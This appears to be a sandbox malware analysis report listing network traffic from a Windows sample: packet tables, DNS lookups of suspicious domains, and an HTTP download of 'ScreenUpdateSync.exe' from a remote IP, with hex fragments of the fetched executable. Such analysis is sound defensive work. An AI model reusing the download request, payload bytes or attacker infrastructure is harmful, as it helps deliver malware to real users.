                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.159269094 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.159410000 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.159492970 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.161708117 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.161752939 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.161808014 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.161853075 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.164206028 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.164257050 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.164294004 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.164462090 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.166683912 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.166738987 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.166873932 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.166937113 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.169250011 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.169301987 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.169302940 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.169342995 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.171679020 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.171735048 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.276217937 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.276267052 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.278325081 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.278378010 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.278453112 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.278501034 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.279308081 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.279381037 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.279407024 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.279422998 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.280621052 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.280677080 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.280952930 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.281008005 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.282147884 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.282197952 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.282253981 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.282299995 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.283734083 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.283786058 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:29.969451904 CET49707443192.168.2.8172.67.207.38
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:29.969552994 CET44349707172.67.207.38192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:29.969640970 CET49707443192.168.2.8172.67.207.38
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:29.970752954 CET49707443192.168.2.8172.67.207.38
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:29.970812082 CET44349707172.67.207.38192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:30.507143021 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:30.508984089 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.198014021 CET44349707172.67.207.38192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.198096991 CET49707443192.168.2.8172.67.207.38
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.200911999 CET49707443192.168.2.8172.67.207.38
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.200922966 CET44349707172.67.207.38192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.201365948 CET44349707172.67.207.38192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.243020058 CET49707443192.168.2.8172.67.207.38
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.243053913 CET49707443192.168.2.8172.67.207.38
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.243158102 CET44349707172.67.207.38192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.911178112 CET44349707172.67.207.38192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.911287069 CET44349707172.67.207.38192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.911432981 CET49707443192.168.2.8172.67.207.38
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.913764000 CET49707443192.168.2.8172.67.207.38
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.913801908 CET44349707172.67.207.38192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.057718039 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.057785988 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.057862997 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.058195114 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.058212996 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.274620056 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.274722099 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.322812080 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.322896004 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.323869944 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.325624943 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.325624943 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.325799942 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.267287970 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.267419100 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.267503023 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.267651081 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.267676115 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.267693996 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.267702103 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.291337013 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.291405916 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.291477919 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.291872978 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.291887999 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:36.684823990 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:36.684901953 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:36.686717987 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:36.686750889 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:36.687000036 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:36.688301086 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:36.735347033 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.462080002 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.462110996 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.462130070 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.462157011 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.462196112 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.462215900 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.462244034 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.633425951 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.633487940 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.633526087 CET49711443192.168.2.823.55.153.106
Dec 15, 2024 09:20:37.633563995 CET | 443 | 49711 | 23.55.153.106 | 192.168.2.8
Dec 15, 2024 09:20:37.633614063 CET | 49711 | 443 | 192.168.2.8 | 23.55.153.106
Dec 15, 2024 09:20:37.663700104 CET | 443 | 49711 | 23.55.153.106 | 192.168.2.8
Dec 15, 2024 09:20:37.663765907 CET | 443 | 49711 | 23.55.153.106 | 192.168.2.8
Dec 15, 2024 09:20:37.663773060 CET | 49711 | 443 | 192.168.2.8 | 23.55.153.106
Dec 15, 2024 09:20:37.663796902 CET | 443 | 49711 | 23.55.153.106 | 192.168.2.8
Dec 15, 2024 09:20:37.663903952 CET | 443 | 49711 | 23.55.153.106 | 192.168.2.8
Dec 15, 2024 09:20:37.663947105 CET | 49711 | 443 | 192.168.2.8 | 23.55.153.106
Dec 15, 2024 09:20:37.664014101 CET | 49711 | 443 | 192.168.2.8 | 23.55.153.106
Dec 15, 2024 09:20:37.664037943 CET | 443 | 49711 | 23.55.153.106 | 192.168.2.8
Dec 15, 2024 09:20:37.664046049 CET | 49711 | 443 | 192.168.2.8 | 23.55.153.106
Dec 15, 2024 09:20:37.664052963 CET | 443 | 49711 | 23.55.153.106 | 192.168.2.8
Dec 15, 2024 09:22:11.544388056 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
Dec 15, 2024 09:22:11.855453968 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
Dec 15, 2024 09:22:12.464911938 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
Dec 15, 2024 09:22:13.683587074 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
Dec 15, 2024 09:22:16.121103048 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
Dec 15, 2024 09:22:21.011703968 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
Dec 15, 2024 09:22:30.746115923 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 15, 2024 09:20:21.527055979 CET | 54310 | 53 | 192.168.2.8 | 1.1.1.1
Dec 15, 2024 09:20:21.828638077 CET | 53 | 54310 | 1.1.1.1 | 192.168.2.8
Dec 15, 2024 09:20:29.679457903 CET | 50583 | 53 | 192.168.2.8 | 1.1.1.1
Dec 15, 2024 09:20:29.817603111 CET | 53 | 50583 | 1.1.1.1 | 192.168.2.8
Dec 15, 2024 09:20:29.821765900 CET | 50741 | 53 | 192.168.2.8 | 1.1.1.1
Dec 15, 2024 09:20:29.963131905 CET | 53 | 50741 | 1.1.1.1 | 192.168.2.8
Dec 15, 2024 09:20:31.916295052 CET | 52321 | 53 | 192.168.2.8 | 1.1.1.1
Dec 15, 2024 09:20:32.056838989 CET | 53 | 52321 | 1.1.1.1 | 192.168.2.8
Dec 15, 2024 09:20:34.296520948 CET | 54571 | 53 | 192.168.2.8 | 1.1.1.1
Dec 15, 2024 09:20:34.437526941 CET | 53 | 54571 | 1.1.1.1 | 192.168.2.8
Dec 15, 2024 09:20:34.441299915 CET | 51869 | 53 | 192.168.2.8 | 1.1.1.1
Dec 15, 2024 09:20:34.579201937 CET | 53 | 51869 | 1.1.1.1 | 192.168.2.8
Dec 15, 2024 09:20:34.582731009 CET | 56023 | 53 | 192.168.2.8 | 1.1.1.1
Dec 15, 2024 09:20:34.721262932 CET | 53 | 56023 | 1.1.1.1 | 192.168.2.8
Dec 15, 2024 09:20:34.727477074 CET | 49571 | 53 | 192.168.2.8 | 1.1.1.1
Dec 15, 2024 09:20:34.865648985 CET | 53 | 49571 | 1.1.1.1 | 192.168.2.8
Dec 15, 2024 09:20:34.868837118 CET | 50855 | 53 | 192.168.2.8 | 1.1.1.1
Dec 15, 2024 09:20:35.007689953 CET | 53 | 50855 | 1.1.1.1 | 192.168.2.8
Dec 15, 2024 09:20:35.009440899 CET | 59245 | 53 | 192.168.2.8 | 1.1.1.1
Dec 15, 2024 09:20:35.148432970 CET | 53 | 59245 | 1.1.1.1 | 192.168.2.8
Dec 15, 2024 09:20:35.151570082 CET | 51366 | 53 | 192.168.2.8 | 1.1.1.1
Dec 15, 2024 09:20:35.290503979 CET | 53 | 51366 | 1.1.1.1 | 192.168.2.8
DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 15, 2024 09:20:21.527055979 CET | 192.168.2.8 | 1.1.1.1 | 0x2110 | Standard query (0) | post-to-me.com | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:29.679457903 CET | 192.168.2.8 | 1.1.1.1 | 0x8a16 | Standard query (0) | sordid-snaked.cyou | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:29.821765900 CET | 192.168.2.8 | 1.1.1.1 | 0xfb75 | Standard query (0) | immureprech.biz | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:31.916295052 CET | 192.168.2.8 | 1.1.1.1 | 0x5077 | Standard query (0) | deafeninggeh.biz | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:34.296520948 CET | 192.168.2.8 | 1.1.1.1 | 0x338c | Standard query (0) | effecterectz.xyz | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:34.441299915 CET | 192.168.2.8 | 1.1.1.1 | 0xb9b8 | Standard query (0) | diffuculttan.xyz | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:34.582731009 CET | 192.168.2.8 | 1.1.1.1 | 0x3710 | Standard query (0) | debonairnukk.xyz | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:34.727477074 CET | 192.168.2.8 | 1.1.1.1 | 0x38e8 | Standard query (0) | wrathful-jammy.cyou | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:34.868837118 CET | 192.168.2.8 | 1.1.1.1 | 0xe4f | Standard query (0) | awake-weaves.cyou | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:35.009440899 CET | 192.168.2.8 | 1.1.1.1 | 0xc679 | Standard query (0) | sordid-snaked.cyou | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:35.151570082 CET | 192.168.2.8 | 1.1.1.1 | 0xc666 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 15, 2024 09:20:21.828638077 CET | 1.1.1.1 | 192.168.2.8 | 0x2110 | No error (0) | post-to-me.com | - | 104.21.56.70 | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:21.828638077 CET | 1.1.1.1 | 192.168.2.8 | 0x2110 | No error (0) | post-to-me.com | - | 172.67.179.207 | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:29.817603111 CET | 1.1.1.1 | 192.168.2.8 | 0x8a16 | Name error (3) | sordid-snaked.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:29.963131905 CET | 1.1.1.1 | 192.168.2.8 | 0xfb75 | No error (0) | immureprech.biz | - | 172.67.207.38 | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:29.963131905 CET | 1.1.1.1 | 192.168.2.8 | 0xfb75 | No error (0) | immureprech.biz | - | 104.21.22.222 | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:32.056838989 CET | 1.1.1.1 | 192.168.2.8 | 0x5077 | No error (0) | deafeninggeh.biz | - | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:32.056838989 CET | 1.1.1.1 | 192.168.2.8 | 0x5077 | No error (0) | deafeninggeh.biz | - | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:32.056838989 CET | 1.1.1.1 | 192.168.2.8 | 0x5077 | No error (0) | deafeninggeh.biz | - | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:32.056838989 CET | 1.1.1.1 | 192.168.2.8 | 0x5077 | No error (0) | deafeninggeh.biz | - | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:32.056838989 CET | 1.1.1.1 | 192.168.2.8 | 0x5077 | No error (0) | deafeninggeh.biz | - | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:32.056838989 CET | 1.1.1.1 | 192.168.2.8 | 0x5077 | No error (0) | deafeninggeh.biz | - | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:32.056838989 CET | 1.1.1.1 | 192.168.2.8 | 0x5077 | No error (0) | deafeninggeh.biz | - | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:34.437526941 CET | 1.1.1.1 | 192.168.2.8 | 0x338c | Name error (3) | effecterectz.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:34.579201937 CET | 1.1.1.1 | 192.168.2.8 | 0xb9b8 | Name error (3) | diffuculttan.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:34.721262932 CET | 1.1.1.1 | 192.168.2.8 | 0x3710 | Name error (3) | debonairnukk.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:34.865648985 CET | 1.1.1.1 | 192.168.2.8 | 0x38e8 | Name error (3) | wrathful-jammy.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:35.007689953 CET | 1.1.1.1 | 192.168.2.8 | 0xe4f | Name error (3) | awake-weaves.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:35.148432970 CET | 1.1.1.1 | 192.168.2.8 | 0xc679 | Name error (3) | sordid-snaked.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 15, 2024 09:20:35.290503979 CET | 1.1.1.1 | 192.168.2.8 | 0xc666 | No error (0) | steamcommunity.com | - | 23.55.153.106 | A (IP address) | IN (0x0001) | false
HTTP Request Dependency Graph

• post-to-me.com
• immureprech.biz
• deafeninggeh.biz
• steamcommunity.com
• 176.113.115.19
HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 176.113.115.19 | 80 | 3284 | C:\Users\user\Desktop\AZCFTWko2q.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:20:23.933777094 CET | 85 | OUT |
    GET /ScreenUpdateSync.exe HTTP/1.1
    User-Agent: ShareScreen
    Host: 176.113.115.19
Dec 15, 2024 09:20:25.258672953 CET | 1236 | IN |
    HTTP/1.1 200 OK
    Date: Sun, 15 Dec 2024 08:20:25 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Sun, 15 Dec 2024 08:15:01 GMT
    ETag: "58600-6294aa91c6503"
    Accept-Ranges: bytes
    Content-Length: 361984
    Content-Type: application/x-msdos-program
    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$SSSfRMtMMeGMs=tjZS MzRMdRMaRRichSPEL2e?\@Cl)PB0.textl `.rdataL"$@@.data=@p @.rsrc0B@@
Dec 15, 2024 09:20:25.258775949 CET | 224 | IN |
    Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 5c 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 51 08 00 00 6a 0c 68 50 25 44 00 e8 7b 16 00 00 8b 75 08 85 f6 74 75 83 3d
    Data Ascii: %\D;@DuQjhP%D{utu=uCjkYeVYEtVPYYE}u7ujWYVj54nDDu"DPY?UQeVEPuu
Dec 15, 2024 09:20:25.258866072 CET | 1236 | IN |
    Data Raw: e8 cf 17 00 00 8b f0 83 c4 0c 85 f6 75 18 39 45 fc 74 13 e8 de 08 00 00 85 c0 74 0a e8 d5 08 00 00 8b 4d fc 89 08 8b c6 5e c9 c3 8b ff 55 8b ec 8b 45 08 56 8b f1 c6 46 0c 00 85 c0 75 63 e8 7e 25 00 00 89 46 08 8b 48 6c 89 0e 8b 48 68 89 4e 04 8b
    Data Ascii: u9EttM^UEVFuc~%FHlHhN;HDtGDHpu"F;FDtFGDHpuFF@puHpF@F^]U3W;t3f;y9Mp8huM?Ex
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258946896 CET1236INData Raw: 82 83 00 00 00 8b de 2b df 8d 43 04 83 f8 04 72 77 57 e8 ec 30 00 00 8b f8 8d 43 04 59 3b f8 73 48 b8 00 08 00 00 3b f8 73 02 8b c7 03 c7 3b c7 72 0f 50 ff 75 fc e8 7a 30 00 00 59 59 85 c0 75 16 8d 47 10 3b c7 72 40 50 ff 75 fc e8 64 30 00 00 59
                                                                                                                                                                                                                                                                                    Data Ascii: +CrwW0CY;sH;s;rPuz0YYuG;r@Pud0YYt1P4YluVYhEY3_^[Vjj /VlhujX^&3^jh%DD6%euYEEE`
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258984089 CET1236INData Raw: 33 c0 40 5f 5e c3 83 24 f5 88 41 44 00 00 33 c0 eb f1 8b ff 53 8b 1d cc 10 44 00 56 be 88 41 44 00 57 8b 3e 85 ff 74 13 83 7e 04 01 74 0d 57 ff d3 57 e8 7e f5 ff ff 83 26 00 59 83 c6 08 81 fe a8 42 44 00 7c dc be 88 41 44 00 5f 8b 06 85 c0 74 09
                                                                                                                                                                                                                                                                                    Data Ascii: 3@_^$AD3SDVADW>t~tWW~&YBD|AD_t~uPBD|^[UE4ADD]jh%D3G}394nDu$j'#hi YYu4AD9tnj*Y;uu3QjYY]9u,h
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259063005 CET1236INData Raw: 14 50 ff 35 80 b4 81 00 57 ff 35 34 6e 44 00 ff 15 dc 10 44 00 3b c7 75 04 33 c0 eb 78 83 05 8c b4 81 00 10 8b 35 7c b4 81 00 a3 80 b4 81 00 6b f6 14 03 35 80 b4 81 00 68 c4 41 00 00 6a 08 ff 35 34 6e 44 00 ff 15 a8 10 44 00 89 46 10 3b c7 74 c7
                                                                                                                                                                                                                                                                                    Data Ascii: P5W54nDD;u3x5|k5hAj54nDDF;tjh hWDF;uvW54nDDN>~|F_^UQQMASVqW3C}i0Dj?EZ@@JujhyhWD
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259154081 CET1236INData Raw: 8b 3b 23 55 f8 23 fe 0b d7 75 0a 83 c3 14 89 5d 08 3b d8 72 e8 3b d8 75 7f 8b 1d 80 b4 81 00 eb 11 8b 53 04 8b 3b 23 55 f8 23 fe 0b d7 75 0a 83 c3 14 89 5d 08 3b d9 72 e8 3b d9 75 5b eb 0c 83 7b 08 00 75 0a 83 c3 14 89 5d 08 3b d8 72 f0 3b d8 75
                                                                                                                                                                                                                                                                                    Data Ascii: ;#U#u];r;uS;#U#u];r;u[{u];r;u1{u];r;u]u3S:YKC8tCUt|D#M#u)eHD9#U#uEUi
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259190083 CET1236INData Raw: 33 f6 46 33 db 89 5d e4 83 fe e0 77 69 83 3d 94 b4 81 00 03 75 4b 83 c6 0f 83 e6 f0 89 75 0c 8b 45 08 3b 05 84 b4 81 00 77 37 6a 04 e8 96 f2 ff ff 59 89 7d fc ff 75 08 e8 9c fa ff ff 59 89 45 e4 c7 45 fc fe ff ff ff e8 5f 00 00 00 8b 5d e4 3b df
                                                                                                                                                                                                                                                                                    Data Ascii: 3F3]wi=uKuE;w7jY}uYEE_];tuWS6.;uaVj54nDD;uL9=0sDt3VYrE;PE3uj:Y;uE;t8-t"ttHt3
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259227037 CET1236INData Raw: 00 00 8d 75 ef 8a 0e 84 c9 0f 84 c2 00 00 00 0f b6 46 ff 0f b6 c9 e9 a6 00 00 00 68 01 01 00 00 8d 43 1c 56 50 e8 96 29 00 00 8b 4d e4 83 c4 0c 6b c9 30 89 75 e0 8d b1 e8 46 44 00 89 75 e4 eb 2a 8a 46 01 84 c0 74 28 0f b6 3e 0f b6 c0 eb 12 8b 45
                                                                                                                                                                                                                                                                                    Data Ascii: uFhCVP)Mk0uFDu*Ft(>EFDD;FG;v}FF>uuE}ur{CgjCCFDZf1Af0A@@JuL@;vFF~4C@IuCCSs
